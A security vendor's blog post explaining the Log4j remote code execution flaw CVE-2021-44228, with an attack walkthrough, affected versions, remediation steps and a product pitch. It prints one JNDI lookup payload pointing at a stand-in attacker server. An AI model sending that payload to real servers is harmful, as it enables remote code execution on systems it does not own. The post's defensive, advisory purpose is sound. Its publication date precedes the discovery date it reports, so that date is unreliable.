OUR BLOG

How this new zero day RCE vulnerability in Log4j Java library is setting the Internet on fire (CVE-2021-44228)

Java logging framework Log4j is used to generate logs and record the activity inside an application. The vulnerability can be exploited to allow unauthorised remote code execution on the affected servers. PingSafe can detect the Log4j vulnerability on your infrastructure without having an agent in your environment.

Security Research

On the 9th of December, 2021, a new vulnerability CVE-2021-44228 was discovered in Log4j, a popular open-source Java logging framework distributed under Apache Software License. The vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password.

Due to the severity of this vulnerability, PingSafe strongly recommends that customers apply the updates to their library as soon as possible.

Shortly after the release of the vulnerability, PingSafe added the exploit in the scans to ensure alerts from the 0-day exploit.

The Vulnerability:

Java logging framework Log4j is used to generate logs and record the activity inside an application. The vulnerability can be exploited to allow unauthorised remote code execution on the affected servers. Hackers are still utilising the recently discovered exploit to attack the servers. The exploit lets an attacker execute malicious Java code on the vulnerable server.

  • The attacker will invoke any server endpoint with a malicious payload.
  • The server logs the data in the request using the Log4j library, containing the malicious payload: ${jndi:ldap://attacker-server.com} 

Here, “attacker-server” refers to the hacker-owned server.

  • This payload triggers the log4j vulnerability, sending a request to the attacker’s server.
  • The request is made via JNDI (Java Naming and Directory Interface), which responds with a remote Java class file.
  • The remote class file is injected into the server, which acts as the second triggering payload and provides remote code execution access to the attacker.

Affected Systems:

Various applications and cloud services using Apache Struts are under the radar of this attack. Security researchers have already discovered that the Log4j vulnerability can be exploited in servers operated by Apple, Cloudflare, Twitter, and other large companies. 

It is highly recommended to upgrade the Log4j framework to log4j-2.15.0-rc2 or higher.

The following versions of Log4j are impacted:

2.0 <= version <= 2.14.1

You can check the PingSafe dashboard under Asset Security, find out if your servers are secure. 

PingSafe Dashboard



Steps for Remedation:

The latest version of Log4j has been released on the official website. You can download it and upgrade your service to use the newest version.

Although it is recommended to upgrade to the latest version of Log4j, you can also secure servers running on the previous versions. This can be done by adding “formatMsgNoLookups=true” to the servers running above version 2.10.0 and higher. This statement is not required for the updated version as it has become the default behaviour.

References:

NVD - CVE-2021-44228 

How can PingSafe help?

PingSafe can detect this Log4j vulnerability on your infrastructure without having an agent in place. To protect your cloud infrastructure from this as well as new zero-day vulnerabilities, request your early access to PingSafe at https://www.pingsafe.ai/company/contactus.


September 13, 2021
ABOUT THE AUTHOR
Anand Prakash

Anand Prakash is a prolific security researcher who is famous for finding bugs in some of the world’s most popular apps and websites. He thrives off of “bug bounties” — large cash prizes he earns from companies in exchange for successfully hacking their systems and showing them their security flaws. Anand is supremely good at what he does, having discovered vulnerabilities at companies like Facebook, Twitter, and Uber. For the past 5 years, Facebook’s has ranked Anand as one of their top bounty hunters. And on Twitter’s bounty program, he’s ranked #3 world-wide. Anand’s reputation as a hacker has lead to him being featured in last year’s Forbes “30 under 30” for enterprise technology in Asia.

In the news

LET’S TRY!

Stay up to date with our research

Subscribe to our newsletter and receive notifications for new articles

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.